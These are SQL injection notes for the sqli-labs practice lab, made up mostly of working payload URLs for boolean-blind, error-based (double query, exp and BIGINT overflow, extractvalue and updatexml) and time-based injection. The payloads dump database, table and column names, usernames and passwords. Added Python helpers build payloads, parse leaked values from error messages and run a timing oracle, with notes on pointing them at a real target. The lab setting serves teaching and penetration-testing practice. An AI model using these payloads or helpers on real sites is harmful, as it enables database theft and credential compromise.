URL: guess whether the first character is greater than 'i': http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)>'i'--+
URL: confirm that the first character is 's': http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)='s'--+
1.1.1.2. Guessing the second character
URL: the already-known first character must be kept in the prefix so that the second character can be guessed: http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),2)='se'--+
URL: there is no ninth character, so the condition is false and the normal page content disappears, as in the URL below (left() can only return the 8 characters that exist, and 'security' > 'securitya' is false): http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),9)>'securitya'--+
1.1.2. Dumping database names
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit 0,1),1)='i'--+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit 0,1),12)='information_'--+
1.1.2.1. First table
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='e'--+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),3)='ema'--+
1.1.2.2. Second table
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 1,1),1)='r'--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 1,1),2)='re'--+
Other tests: keep guessing the remaining tables the same way by increasing the limit offset (they include users and others); not carried out here.
1.1.3. Dumping column names
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'--+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id'--+
Other column names: id, username, password
1.1.4. Dumping data
URL: note: the first username actually begins with an uppercase 'D', but this comparison cannot tell case apart, because under the table's default case-insensitive collation 'd' and 'D' compare equal; prefix the expression with binary (for example binary left(...)='D') or compare ascii() values when case matters: http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),1)='d'--+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),2)='du'--+
1.2.1. Dumping the database name
URL: 115 -> 's': http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),1,1))=115 --+
Other URL: 101 -> 'e': http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),2,1))=101 --+
Note: once the position is past the end of the string, substr() returns the empty string and ascii('') is 0, so even a comparison against the lowest printable code is false and the normal page disappears; that is the signal that the value has been fully extracted:
URL: http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),9,1))>65 --+
1.2.2. Dumping tables
URL: 101 -> 'e': http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+
Other URL: 109 -> 'm': http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+
Same as above, only the position and the code change; table names include users, emails, etc.
1.2.3. Dumping columns
URL: 105 -> 'i': http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105 --+
Other URL: 100 -> 'd': http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=100 --+
Format for the ord()/mid() variant: ord(string) returns the character code of the extracted character (identical to ascii() for single-byte characters; for a multi-byte character it returns the combined code of all its bytes); mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1) extracts the first character of the first row of the column (IFNULL substitutes a space for NULL so the comparison does not silently fail); general form: mid(column_name,start[,length])
1.3.1. Dumping the database name
URL: code of the first character: http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),1,1))=115--+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),2,1))=101--+
Format for the regexp variant: regexp '^...' anchors the pattern to the start of the value, so a character class narrows the candidate set one position at a time, for example: and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1) --+ (note that regexp is case-insensitive unless the operand is a binary string, the same limitation as the left() comparison above)
1.4.1. Dumping the database name
URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[a-z]' limit 0,1) --+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[s-s]' limit 0,1) --+
1.4.2. Dumping tables
URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-s]' limit 0,1) --+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[e-e]' limit 0,1) --+
1.4.3. Dumping columns
URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^[a-z]' limit 0,1) --+
URL (double-query error: count(*) grouped on a key built from the injected value and floor(rand(0)*2) makes the GROUP BY temporary table hit a duplicate key, and the 'Duplicate entry' message echoes that key; information_schema.columns is used as the source table because the trick needs at least three rows): http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.1. Dumping database names
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 6,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.2. Dumping tables
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.3. Dumping columns
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.4. Dumping data
URL: this payload dumps one column at a time (concat() several columns into the subquery to get more than one per request): http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select username from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
Other URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select password from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
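Why the double query above needs rand(0) and at least three source rows is easier to see in a simulation than in prose. The following is an added example, not part of the original notes: it replays the way MySQL materialises a GROUP BY in a temporary table (evaluate the key for the lookup; if absent, evaluate it again while inserting), which is what lets a non-deterministic key collide with itself. The sequence of floor(rand(0)*2) values it uses is the commonly documented start of that sequence and is an assumption of the simulation, as is the exact wording of the error message.

```python
"""Simulation of the double-query error: count(*) ... group by floor(rand(0)*2).

Added example, not part of the original notes. The value sequence and the error
text are assumptions matching commonly documented MySQL behaviour.
"""
import re
from typing import Iterable, Optional, Tuple

# Assumed start of floor(rand(0)*2) for successive rows (rand(0) is seeded, so it
# is the same on every run, which is why the attack is repeatable).
FLOOR_RAND0_SEQ = [0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0]


def simulate_group_by(rows: int, key_seq: Iterable[int], leaked: str
                      ) -> Tuple[Optional[str], dict]:
    """Run the temp-table GROUP BY algorithm over `rows` source rows.
    The group key is concat(':', leaked, ':', <next value from key_seq>).
    Returns (error message or None, final temporary table)."""
    seq = iter(key_seq)
    table: dict = {}
    for _ in range(rows):
        key = f":{leaked}:{next(seq)}"          # evaluated once for the lookup
        if key in table:
            table[key] += 1
            continue
        key = f":{leaked}:{next(seq)}"          # evaluated again for the insert
        if key in table:                         # collides with an existing group
            return f"Duplicate entry '{key}' for key 'group_key'", table
        table[key] = 1
    return None, table


LEAK_RE = re.compile(r"Duplicate entry ':(.*):[01]' for key")


def extract_from_error(message: str) -> Optional[str]:
    """Pull the injected value back out of the duplicate-key message."""
    m = LEAK_RE.search(message)
    return m.group(1) if m else None


if __name__ == "__main__":
    for n in (1, 2, 3):
        err, _ = simulate_group_by(n, FLOOR_RAND0_SEQ, "security")
        print(n, "rows ->", err or "no error")
```

With the assumed sequence, row 1 looks up key 0, finds nothing, and inserts key 1; row 2 looks up key 1 and just increments it; row 3 looks up key 0, finds nothing, re-evaluates to 1 and collides. Fewer than three rows never error, and a deterministic key never errors, which is why the payload selects from a large table and seeds rand().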
URL (DOUBLE overflow error with exp(): ~ applied to the subquery's string result yields 18446744073709551615, exp() of that is out of range for DOUBLE, and the error message echoes the subquery text; this only works on MySQL builds whose overflow error still quotes the offending expression, newer releases return a generic message): http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+
If the number of union columns is wrong, the query fails with a column-count mismatch instead of the overflow error, as here with only two columns:
URL: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),3--+
2.2.1. Dumping database names
First database: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 0,1)a))),2,3--+
Second database: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 1,1)a))),2,3--+
2.2.2. Dumping tables
First table: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from information_schema.tables where table_schema='security' limit 0,1)a))),2,3--+
Third table: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from information_schema.tables where table_schema='security' limit 2,1)a))),2,3--+
2.2.3. Dumping columns
First column name: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT column_name from information_schema.columns where table_name='users' limit 0,1)a))),2,3--+
2.2.4. Dumping data
First row: note: this dumps only the username column; http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit 0,1)a))),2,3 --+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit 1,1)a))),2,3 --+
2.2.5. Dumping two columns at once
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct concat(0x3a,username,0x3a,password) from security.users limit 0,1)a))),2,3 --+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct concat(0x3a,username,0x3a,password) from security.users limit 1,1)a))),2,3 --+
2.3. BIGINT overflow
For how this arises see 《mysql注入之bigint溢出报错注入》 (MySQL injection: BIGINT overflow error-based injection), which covers it fully. In short: ~0 is 18446744073709551615 (the BIGINT UNSIGNED maximum), !(subquery) evaluates to 0 or 1 (a non-numeric string converts to 0, so NOT gives 1), and subtracting ~0 from it leaves the unsigned range, so MySQL raises 'BIGINT UNSIGNED value is out of range' with the subquery echoed in the quoted expression. As with exp(), this depends on the server quoting the expression in the overflow error, which newer MySQL releases no longer do.
2.3.1. Dumping database names
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from information_schema.schemata limit 0,1)x) - ~0),2,3--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from information_schema.schemata limit 6,1)x) - ~0),2,3--+
2.3.2. Dumping tables
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables where table_schema='security' limit 0,1)x) - ~0),2,3--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables where table_schema='security' limit 1,1)x) - ~0),2,3--+
2.3.3. Dumping columns
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)x) - ~0),2,3--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns where table_name='users' limit 1,1)x) - ~0),2,3--+
2.3.4. Dumping data
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 0,1)x) - ~0),2,3--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 1,1)x) - ~0),2,3--+
2.4.1. XPath injection with extractvalue()
2.4.1.1. Dumping the database name
URL (0x7e is '~', which is not valid XPath, so extractvalue() raises an XPATH syntax error that quotes the concatenated string; the message shows at most 32 characters, so longer values have to be read in pieces with substr()): http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select user()),0x7e))--+
2.4.1.2. Dumping tables
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e))--+
2.4.1.3. Dumping columns
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e))--+
2.4.1.6. Dumping data
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e))--+
2.4.2. XPath injection with updatexml()
2.4.2.1. Dumping the database name
URL (same mechanism and same 32-character limit as extractvalue(); the invalid XPath goes in the second argument): http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
2.4.2.3. Dumping tables
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1)--+
2.4.2.4. Dumping columns
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)--+
2.4.2.5. Dumping data
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1)--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 1,1),0x7e),1)--+
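The extractvalue() and updatexml() payloads above work as written for short values like a database name, but the XPATH syntax error only ever shows 32 characters, and both 0x7e markers count toward that. The following is an added example, not code from the original notes: it builds the updatexml() payload with a substr() window (keeping only the leading 0x7e, since one invalid character is enough to force the error and a trailing one would waste the last visible character), parses the chunk out of the error text, and walks a long value window by window. The server responses are constructed to match the MySQL message format; nothing is sent anywhere.

```python
"""Reading values longer than 32 characters through updatexml()/extractvalue() errors.

Added example, not part of the original notes. `make_fake_server` is a constructed
stand-in that applies substr() and the 32-character truncation of the XPATH error.
"""
import re
from typing import Callable

XPATH_LIMIT = 32                 # characters MySQL shows in the XPATH syntax error
WINDOW = XPATH_LIMIT - 1         # the leading '~' occupies one of them
ERR_RE = re.compile(r"XPATH syntax error: '~(.*?)~?'")


def build_payload(expr: str, offset: int, width: int = WINDOW) -> str:
    """id= value in the notes' updatexml() form, reading `width` characters from
    1-based `offset` of the subquery result."""
    return f'1" and updatexml(1,concat(0x7e,substr(({expr}),{offset},{width})),1)--+'


def parse_window(response: str) -> str:
    """Return the echoed chunk without the '~' markers (works for the notes' form
    with a trailing 0x7e too)."""
    m = ERR_RE.search(response)
    if m is None:
        raise ValueError("response contains no XPATH syntax error")
    return m.group(1)


def extract_long(fetch: Callable[[int, int], str], width: int = WINDOW,
                 max_len: int = 4096) -> str:
    """Walk the value window by window; a window shorter than `width` means the end."""
    out, offset = [], 1
    while offset <= max_len:
        chunk = parse_window(fetch(offset, width))
        out.append(chunk)
        if len(chunk) < width:
            break
        offset += width
    return "".join(out)


def make_fake_server(secret: str) -> Callable[[int, int], str]:
    """Constructed stand-in: substr() semantics plus MySQL's 32-character truncation."""
    def fetch(offset: int, width: int) -> str:
        chunk = secret[offset - 1: offset - 1 + width]
        return f"XPATH syntax error: '{('~' + chunk)[:XPATH_LIMIT]}'"
    return fetch


if __name__ == "__main__":
    hashes = "Dumb:Dumb|Angelina:I-kill-you|Dummy:p@ssword"   # constructed sample value
    print(extract_long(make_fake_server(hashes)))
    print(build_payload("select group_concat(username,0x3a,password) from security.users", 32))
```

On a real target `fetch` would format the payload with build_payload(), request the page and return its body; the parser then only needs the error text to survive in the response, which is exactly the condition under which this technique applies at all.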
URL: confirm the time-based injection point; if the response takes about 5 seconds longer than normal, the injected sleep() ran: http://sqli-labs.me:8888/Less-10/?id=1" and sleep(5)--+
3.1.3. Dumping the database name
URL: 115 -> 's' (the response is delayed only when the guess is right): http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid(database(),1,1))=115,sleep(5),1)--+
3.1.5. Dumping tables
URL: 101 -> 'e': http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)--+
3.1.6. Dumping columns
URL: 105 -> 'i': http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),1)--+
3.1.7. Dumping data
URL: 68 -> 'D' (ord() compares the byte value, so unlike the left() comparison in 1.1.4 this does distinguish upper from lower case): http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select username from security.users limit 0,1),1,1))=68,sleep(5),1)--+
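A time-based oracle has only latency to go on, so the decision rule matters more than the payload: one slow packet must not become a wrong character. The following is an added example, not code from the original notes: it measures a baseline on a request whose condition is always false, treats a response as "true" only when it exceeds the baseline by most of the sleep() delay, and re-asks on every positive before accepting it. `make_fake_server` is a constructed stand-in that sleeps when the injected condition holds and adds random jitter; no HTTP is involved, and the delay is kept small so the example runs quickly.

```python
"""Time-based oracle with baseline, threshold and confirmation.

Added example, not part of the original notes. `make_fake_server` is a constructed
stand-in for the Less-10 page.
"""
import random
import re
import time
from statistics import median
from typing import Callable

Send = Callable[[str], None]   # submits the id= value; the body is irrelevant here
COND_RE = re.compile(r"ord\(mid\(\((.+?)\),(\d+),1\)\)=(\d+),sleep\(([\d.]+)\)")


def build_payload(subquery: str, pos: int, code: int, delay: float) -> str:
    """Less-10 form from the notes: if(ord(mid(<subquery>,pos,1))=code,sleep(delay),1)."""
    return f'1" and if(ord(mid(({subquery}),{pos},1))={code},sleep({delay}),1)--+'


def make_fake_server(secret: str, jitter: float = 0.003, seed: int = 1) -> Send:
    """Sleeps for the requested delay when the condition is true, plus random jitter."""
    rng = random.Random(seed)

    def send(payload: str) -> None:
        time.sleep(rng.uniform(0, jitter))          # network noise
        m = COND_RE.search(payload)
        if m:
            pos, code, delay = int(m.group(2)), int(m.group(3)), float(m.group(4))
            actual = ord(secret[pos - 1]) if pos <= len(secret) else 0
            if actual == code:
                time.sleep(delay)
    return send


def timed(send: Send, payload: str) -> float:
    t0 = time.perf_counter()
    send(payload)
    return time.perf_counter() - t0


def baseline(send: Send, samples: int = 5) -> float:
    """Median latency of a request whose injected condition is always false."""
    return median(timed(send, '1" and 1=0--+') for _ in range(samples))


def timed_oracle(send: Send, payload: str, delay: float, base: float,
                 confirmations: int = 1) -> bool:
    """True only if every one of 1+confirmations attempts exceeds the threshold."""
    threshold = base + 0.8 * delay
    return all(timed(send, payload) > threshold for _ in range(1 + confirmations))


def recover_char(send: Send, subquery: str, pos: int, delay: float, base: float,
                 alphabet: str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
                 ) -> str:
    """Linear scan over a candidate alphabet, probing one code per request as the notes do."""
    for ch in alphabet:
        if timed_oracle(send, build_payload(subquery, pos, ord(ch), delay), delay, base):
            return ch
    return ""


if __name__ == "__main__":
    srv = make_fake_server("Dumb")          # constructed secret, first username in the notes
    base = baseline(srv)
    print(recover_char(srv, "select username from security.users limit 0,1", 1, 0.1, base))
```

Because a false answer costs only the round trip while a true one costs the full delay, the total run time is dominated by the hits; the binary search from the boolean-blind example above transfers unchanged if `timed_oracle` is used with a '>' comparison instead of '=', and cuts the number of sleeps per character from up to one per candidate to at most seven.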